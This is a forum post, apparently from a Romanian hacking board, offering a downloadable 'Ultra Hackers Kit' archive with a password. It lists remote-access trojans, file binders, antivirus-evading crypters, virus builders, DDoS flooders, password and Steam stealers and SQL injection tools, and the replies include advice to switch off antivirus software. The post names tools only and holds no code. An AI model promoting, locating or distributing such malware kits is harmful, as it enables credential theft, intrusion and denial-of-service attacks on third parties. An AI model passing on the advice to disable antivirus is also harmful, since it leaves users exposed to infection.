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Ultra Hackers Kit 376

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Remote Administration Tools/Trojans

1. Cerberus 1.03.4 BETA

2. Turkojan 4 GOLD

3. Apocalypse 1.4.4

4. Spy-Net 2.6

5. Pro Rat v1.9

6. Poison Ivy 2.3.2

7. Bandook Rat v1.35

8. Bifrost v1.0

9. CyberGate v.1.01.0

10. Lost Door v4.2 LIGHT

11. Beast 2.07

12. Shark v3.0.0

13. Sub7 v2.2

14. Pain RAT v0.1

15. xHacker Pro v3.0

16. Seed v1.1

17. Optix Pro v1.33

18. Darkmoon v4.11

19. CIA v1.3

20. Y3k RAT v1.0

21. MiniMo RAT v0.7

22. NetDevil v1.0

23. Deeper RAT v1.0

24. Schwarze Sonne RAT 0.1 Public Beta 2

25. Schwarze Sonne RAT 0.7

26. Schwarze Sonne RAT 0.8

27. Schwarze_Sonne_0.5_Beta

28. Schwarze Sonne RAT 0.2 Beta

29. [bUGFIX]SS-RAT 0.4 Final

30. A32s (fifth) RAT

31. Arctic R.A.T. 0.0.1 Alpha

32. CyberGate v1.02.0

33. CyberGate v1.03.0

34. CyberGate v1.04.8

35. CyberGate_v1.01.8

36. CyberGate-v1.00.0

37. Daleth RAT 1.0(ss rat src)

38. DarkComet2RC1

39. DarkComet2RC5

40. DarkComet-RAT 2.0 Final

41. DarkComet-RAT 2.0 Final RC2

42. DarkComet-RAT 2.0 LAST BETA

43. DarkComet-RAT 2.0b3

44. DarkComet-RAT 2.0b 2

45. Deeper 1.0 Beta10 - Fix1

46. Deeper_1.0_Beta8

47. Deeper_1.0_Beta9

48. DRAT 2009 V4.0 Build 1201

49. DRAT 2009 V4.2 Build 1216

50. Golden Phoenix Rat 0.2

52. GraphicBooting RAT Beta v0.3

53. Lost Door V2.2 Stable Public edition

54. Lost Door v4.3.1

55. miniRAT 0.6 Beta

56. NovaLite_final5

57. Pocket RAT

58. Spy-Net 2.7

59. SS-RAT 0.5 Final

60. SS-RAT 0.6 Final_bugfix

61. SS-RAT 0.6 Public Beta

62. Vanguard

63. Venomous Ivy

64. VorteX RAT

65. Xtreme RAT v1.0

66. Remote Administrator (Radmin) v3.1 Cracked

75. MofoTro

76. Arabian-Attacker v1.2.2

77. Arabian-Attacker v1.4.0

78. Archelaus Beta

79. Arctic R.A.T. 0.0.1 Alpha

80. Arctic R.A.T. 0.1

81. Char0n

82. Erebus v1.0.2 Private Cracked

83. Nytro Rat + Source Code



1. UniProject Binder

2. Sh!t Multi Binder

3. bl0b Binder + Unique Stub Generator

4. Sadaf Binder

5. vBinder

6. KBW Binder

7. SaLiXeM Binder

8. YAB Binder V2.01

9. EES Binder V1.0

10. Albertino Binder

11. Rapid Binder v 1.0[ultimate Files To Bind] - 100 % FUD

12. BlackHole Binder

13. F.B.I. Binder

14. Predator 1.6

15. PureBiND3R by d3will

16. Schniedelwutz Binder 1.0

17. Simple Binder by Stonedinfect

18. sp1r1tus Binder 1.0

19. Tool-Store Binder 1.0

20. Tool-Store Toasty Binder 1.0

21. Yet Another Binder 2.0



1. Carb0n Crypter v1.8

2. Fly Crypter v2.2 + Unique Stub Generator 0.6

3. JCrypter

4. Triloko Crypter

5. Halloween Crypter

6. Deh Crypter

7. Hatrex Crypter

8. Octrix Crypter

9. NewHacks Crypter

10. Refruncy Crypter

11. Polifemo Ebrio Crypter

12. Infinity Crypter

13. Hallow's Scantime Crypter

14. Daemon Crypt v2.0

15. NTPacker

16. El Bruto Crypter V2

17. [FUD] 146, crypter/packer/downloader/startup

18. iCrypt Abronsius Edition

19. Simple ASM Crypter

20. XxVtecman9xX_Crypter

21. Grenade Crypter (NEW)

22. Sick Crypter

23. Sikandar's_Crypter_Version_1.0_Public

24. Bifrost Crypter by ArexX 2

25. Cryptable Seduction 1.0 by DizzY

26. Crypter by Permabatt

27. Crypter bY YoDa

28. Cryptic 1.5

29. Deception 4 by [RaGe] [Favorite ]

30. Destructor Crypter

31. EXECrypt 1 M0d by CARDX

32. Fuzz Buzz 1.2 by BulletProof

33. OSC-Crypter by haZl0oh M0d

34.Poison Ivy Crypt M0d by CARDX

35. SaW V1 Mod by LEGIONPR

36. Skorpien007 Crypter 3.1

37. Stonedinfect Crypter 1.0

38. Trojka Crypter 1.1 by tr1p0d

39. Deception 4 by [RaGe]


Virus Builders

1. Nathan's Image Worm

2. Dr. VBS Virus Maker

3. p0ke's WormGen v2.0

4. Vbswg 2 Beta

5. Virus-O-Matic Virus Maker

6. Kill Switch v1.0

7. TeraBIT Virus Maker v2.8

8. Hell P2P Worm Generator v1.8

9. Shadow Batch Virus Gen [5.0.0

10.DELmE's Batch Virus Generatorv2.0



1. DD7 Port Scanner

2. SuperScan 4.0

3. Trojan Hunter v1.5

4. ProPort v2.2

5. Bitching Threads v3.1

6. Blue's Port Scanner V5

7. Angry IP Scanner 2.21

8. XSS Scanner

9. TE Port Scanner

10. Free IP Scanner

11. Bobup Scanner v2.1.2

12. Advanced IP Scanner

13. Advanced Port Scanner

14. Bitching Threads

15. LanSpy

16. NeoTracePro

17. NetScanTools

18. ProPort

19. Putty v0.6

20. SuperScan

21. ZenMap - Nmap v5.21 [Win]


DoSers, DDoSers, Flooders and Nukers

1. rDoS

2. zDoS

3. Site Hog v1

4. SYN Flood

5. BFF DoS

6. Good Bye v3.0

7. RPCNuke 1.0

8. Rocket v1.0

9. Panther Mode 2

10. Final Fortune 2.4

11. Click v2.2

12. BattlePong

13. Assault V1.0

14. Supernova V5 DDos Tool ( VIP )

15. HTTP Flood Denial of Service (DoS) Testing Tool

16. iGirls DoS Tool [Free]

17. Longcat Flooder 2.3 (DoS Tool)

18. DoS v5.5 (Denial Of Service)

19. Counter strike style DoS

20. XDos, Dos Tool

21. t3c4i3 Dos Tool v2.00 [updated 9/3/2010]

22 BioHazard DoS 2

23. BioHazard DoS (TCP)

24. FubarDoS - DoS tool now public

25. Black Mamba Dos Attacker 13Mb/s

26. ~FuCk It!~ DOS

27. NetBotAtt14En

28. Click v2.2

29. Spoofed IRC Nuker v1.3

30. Hartz4Flooder v0.2

31. Bitslap

32. Crazyping v1.1

33. Killme v1.0

34. Bd0rk's DoS killer

35. Krate port bomber

36. Fed up v2.0

37. Gimp

38. Muerte v2.1

39. Kaput v1.0 & beta v1.5

40. Donut http flooder v1.4

41. Blood lust

42. Hospitables nuker v2.2

43. Bitchslap v1.0

44. Razors DoS tool v1.1

45. Try2DdoS

46. Firewall killer v1.3

47. Death n destruction

48. Assault v1.0

49. NetBot Attacker v1.4 English

50. Panteher v2.0

51. Battle Pong

52. Nemesy v1.3

53. Meliksah nuke v2.5

54. Inferno Nuker

55. Igmp nuke v1.0

56. Server attack Ddos


58. MegaD34TH - DDOS / Scan / Attack / Freeze tool!

59. xFatex DDOS Network/server Flooder

60. {??} SuPeRdOS {??}

61. Website_Crasherv4.7

62. IFRAME_DDoS_v1.0

63. IP Port Ddos

64. IRAN DoS



1. Dark Screen Stealer V2

2. Dark IP Stealer

3. Lab Stealer

4. 1337 Steam Stealer

5. Multi Password Stealer v1.6

6. Firefox Password Stealer

7. PassStealer v3.0

8. PWStealer V2.0

9. Universal1337 V2

10. Lord PS

11. JPS 1.8

12. spam Stealer

13. Aura Stealer v1.0b

14. BKL Stealer V2.0

15. spam Stealer/Keylogger

16. iStealer 3.0

17. iStealer 4.0

18. iStealer 5.0 (MOD)

19. Midnight Stealer 1.5

20. Ref Stealer v1.0

21. Remote Penetration v2.2

22. SimpleStealer v1.2

23. Unlimited PW Stealer v0.4

24. iStealer 6.3

25.1337 SteamACC Stealer Private

26.Allround Stealer

27. Armageddon Stealer 1.0 by Krusty

28. bl0b Recovery 1.0

29. Blade Stealer 1.0 PUBLIC

30.Codesoft PW Stealer 0.35

31. Codesoft PW Stealer 0.50

32. Dark Screen Stealer 2

33. Dimension Stealer 2 by Gumball

34. FileZilla Stealer 1.0 PUBLIC

35. FileZilla Stealer by Stonedinfect

36. Firefox Password Stealer - Steamcafe

37. Fly Stealer 0.1

38. Fudsonly Stealer 0.1

39. Hackbase Steam Phisher 1.2 BETA

40. spam

41. spam Stealer

42. HardCore Soft

43. ICQ Steal0r

44. IStealer 4.0

45. IStealer 6.0 Legends

46. LabStealer by Xash

47. Multi Password Stealer 1.6

48. Papst Steale.NET

49. Pass Stealer 3.0

50. Pesca Stealer 0.2

51. pixel Stealer 1.3.0 SC

52. pixel Stealer 1.4.0

53. ProStealer

54. Public Firefox 3 Stealer

51. Pure-Steam 1.0 CS

52. Pw Stealer by Killer110

53. Remote Penetration 2.2

54. SC LiteStealer 1

55. SimpleStealer 2.1

56. SPS Stealer

57. SStealer by till7

58. Steam Stealer 1.0 by ghstoy

59. Steam Stealer by till7

60. Stupid Stealer 6 mit PHP Logger

61. System Stealer 2

62. The Simpsons Stealer 0.2

63. Tool-Store FileZilla Stealer 1.0

64. Ultimate Stealer 1.0

65. Universal1337 - The Account Stealer

63. Universal1337 3



Sql Injection Tools

1.Vbulletin 3.6.5 Exploit

2.sqliHelper 2.7

3.sqli column counter

4.exploit scanner

5.cpanel bruteforcer

6.blind Sqli

7.admin finder




11.Acunetix.Web.Vulnerability.Scanner.Enterprise.E dition.v6.0-EDGE

12.Havij 1.08 - Advanced SQL Injection Tool

13.Hexjector v1.0.7.3 Special Edition

14.SQL ExploitScanner V3 Rebuild Version

15.SQL Exploiter Professional v2.15

16.Pangolin Released

17.SQL Injection Tool v2.1

18.SQL Power Injector 1.2

Rar password: Spy-Net

Download : DepositFiles

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Welcome back Oust.

Dupa ce omu' da share cu voi si nu pastreaza doar pentru el nici like nu stitii sa dati?!.

Crezi ca Oust ar infecta pe cineva de aici dupa tot timpul petrecut aici?! Hai sa fim seriosi.

Sa fim seriosi va puteti da seama si voi ca contin virusii dar nu in cuvantul real, doar sunt cryptere, rat-uri etc.

Merci omule.

Posted (edited)

@Mr.Kode nu sunt TK.

@makv3li da tu de unde ai aparut?!

Tot ce este la SQL TOOLS este curat.

Am testat mai multe programe o sa las in cateva zile o lista cu toate programele curate.

@Oust cripteaza parola

Edited by Cifre
multam' , nu mai tot plange-ti ca au virusi ca n-au virusi , rulati in VB si mere ceas:D

Tu chiar vorbesti serios ? Orice antivirus detecteaza acest pack ca fiind infectat de virusi pentru ca asa este si normal. Ar fi foarte anormal daca tot acest pack (foarte bun si folositor) ar fi nedetectat. Acum fiecare intelege ce vrea din denumirea de ,,virus".


da un fel de eroare in winrar -! D:\hack\HackPack.rar: CRC failed in HackPack\Booter Sources\Team313 Booter\Team313 Source Booter\images\bannernew3.jpg. The file is corrupt

! D:\hack\HackPack.rar: Unexpected end of archive

da un fel de eroare in winrar -! D:\hack\HackPack.rar: CRC failed in HackPack\Booter Sources\Team313 Booter\Team313 Source Booter\images\bannernew3.jpg. The file is corrupt

! D:\hack\HackPack.rar: Unexpected end of archive

Opreste antivirusul.

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